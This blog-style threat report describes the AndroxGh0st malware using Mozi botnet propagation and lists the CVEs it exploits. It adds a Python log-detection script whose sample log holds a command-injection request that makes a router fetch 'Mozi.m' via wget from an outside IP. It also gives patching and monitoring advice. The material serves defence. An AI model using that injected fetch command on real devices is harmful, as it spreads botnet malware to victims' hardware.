AndroxGh0st and Mozi Botnet Collaboration Expands Attack Reach

In a concerning evolution of botnet capabilities, cybersecurity researchers have uncovered that the AndroxGh0st malware is now leveraging the Mozi botnet to expand its reach and propagation power. This collaboration aims to exploit a broader range of vulnerabilities, focusing on internet-facing and IoT applications to build a robust network of compromised devices for malicious purposes.

The AndroxGh0st Malware Campaign

AndroxGh0st, a Python-based cloud attack tool, initially gained attention for its focus on targeting Laravel applications to extract sensitive cloud service data, including AWS, SendGrid, and Twilio credentials. Active since 2022, AndroxGh0st has used known vulnerabilities in applications like the Apache web server (CVE-2021-41773) and the Laravel Framework (CVE-2018-15133) to gain unauthorized access, escalate privileges, and maintain persistence.

In January 2024, U.S. intelligence agencies reported that AndroxGh0st had been used to create botnets for targeted exploitation of victim networks. Now, according to CloudSEK's latest findings, the malware has expanded to exploit an array of vulnerabilities to bolster its botnet:

Exploited Vulnerabilities:

  1. CVE-2014-2120: Cisco ASA WebVPN login page XSS (CVSS 4.3)
  2. CVE-2018-10561/10562: Dasan GPON authentication bypass and command injection (CVSS 9.8)
  3. CVE-2021-26086: Atlassian Jira path traversal (CVSS 5.3)
  4. CVE-2021-41277: Metabase GeoJSON map local file inclusion (CVSS 7.5)
  5. CVE-2022-1040: Sophos Firewall authentication bypass (CVSS 9.8)
  6. CVE-2022-21587: Oracle E-Business Suite file upload (CVSS 9.8)
  7. CVE-2023-1389: TP-Link Archer AX21 command injection (CVSS 8.8)
  8. CVE-2024-4577: PHP CGI argument injection (CVSS 9.8)
  9. CVE-2024-36401: GeoServer remote code execution (CVSS 9.8)

The AndroxGh0st botnet employs common administrative usernames combined with a consistent password pattern to brute-force access to WordPress /wp-admin panels, allowing it to compromise backend website controls.

Mozi Botnet: Expanding the Attack Vector

The Mozi botnet, primarily known for its attacks on IoT devices, has long been a persistent force in the DDoS landscape. Even after the arrest of its original authors by Chinese authorities in 2021, Mozi remained active until a kill-switch command in August 2023 brought a temporary halt. Despite this setback, Mozi's propagation mechanisms are now integrated within AndroxGh0st, enabling it to spread further through IoT device networks.

AndroxGh0st uses Mozi’s capabilities to propagate malware through devices such as Netgear DGN routers and Dasan GPON home routers, leveraging unauthenticated command execution vulnerabilities to distribute a malicious payload called “Mozi.m” from remote servers.
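The two behaviours described above (password-guessing against WordPress /wp-admin and the pull of a “Mozi.m” payload through a router command-execution bug) both leave traces in web and proxy access logs. The following detection script is an added example, not CloudSEK's or the blog's own code; the log lines are constructed, the addresses are documentation ranges, and the router endpoint is a labelled placeholder rather than a real vulnerable path.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in combined log format (not real traffic, not real IoCs).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "python-requests/2.31"
203.0.113.5 - - [10/Nov/2024:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "python-requests/2.31"
203.0.113.5 - - [10/Nov/2024:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "python-requests/2.31"
203.0.113.5 - - [10/Nov/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "python-requests/2.31"
203.0.113.5 - - [10/Nov/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 1532 "-" "python-requests/2.31"
198.51.100.7 - - [10/Nov/2024:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Nov/2024:10:06:00 +0000] "GET /PLACEHOLDER_ROUTER_ENDPOINT?cmd=wget+http://203.0.113.77/Mozi.m HTTP/1.1" 404 0 "-" "Hello, world"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    # Returns (ip, timestamp, method, uri, status) or None for unparseable lines.
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["uri"], int(m["status"])

def detect(log_text, threshold=5, window_s=60):
    """Flag wp-login brute-force bursts and requests that try to fetch Mozi.m."""
    failed = defaultdict(list)
    mozi_hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, uri, status = rec
        # WordPress re-renders the form with 200 on a failed login and answers
        # 302 on success, so repeated 200s on POST /wp-login.php mean guessing.
        if method == "POST" and uri.startswith("/wp-login.php") and status == 200:
            failed[ip].append(ts)
        # The article names the dropped payload "Mozi.m"; any request carrying
        # that filename is worth an alert whatever the exploited path is.
        if "mozi.m" in uri.lower():
            mozi_hits.append((ip, uri))
    brute = {}
    for ip, times in failed.items():
        times.sort()
        # Sliding window: `threshold` failures within `window_s` seconds.
        if any((times[i + threshold - 1] - times[i]).total_seconds() <= window_s
               for i in range(len(times) - threshold + 1)):
            brute[ip] = len(times)
    return {"wp_bruteforce": brute, "mozi_payload": mozi_hits}
```

Run it against a real access log by passing the file contents to `detect()`; the legitimate single login from 198.51.100.7 is not flagged.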

Implications of the AndroxGh0st-Mozi Integration

By embedding Mozi’s propagation functionalities, AndroxGh0st gains expanded reach across IoT environments, which often lack comprehensive security measures. CloudSEK’s report highlights the strategic advantage of this collaboration:

  1. Enhanced Propagation: Mozi’s IoT infection mechanisms allow AndroxGh0st to bypass traditional endpoint security solutions and access a broader range of devices.
  2. Unified Command Infrastructure: Both botnets reportedly share the same command and control (C2) infrastructure, indicating a high degree of operational integration.
  3. Streamlined Operations: Combining forces allows both botnets to conduct expansive attacks with improved efficiency and coordination, maximizing the impact on compromised systems.

Takeaways for Security Teams and IoT Users

The convergence of these two botnets underscores the importance of robust security practices across cloud applications, IoT devices, and other internet-facing infrastructures. To mitigate the risk of compromise by sophisticated botnets like AndroxGh0st and Mozi, organizations should consider the following best practices:

  1. Patch Known Vulnerabilities: Regularly update and patch systems, applications, and IoT devices to protect against exploits of known vulnerabilities.
  2. Limit Exposure of Critical Applications: Restrict internet-facing exposure of sensitive applications or configure access controls to limit exposure.
  3. Implement Strong Authentication Mechanisms: Utilize multi-factor authentication (MFA) and enforce complex, unique passwords for administrative accounts.
  4. Monitor for Suspicious Activity: Deploy monitoring solutions to detect and respond to signs of unauthorized access or network anomalies.

The AndroxGh0st and Mozi alliance demonstrates a concerning escalation in botnet capabilities, combining credential-stealing, DDoS, and IoT infection tactics. As cybercriminals increasingly collaborate across malware variants, organizations must remain vigilant in safeguarding their networks and internet-connected devices against these evolving threats.


© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067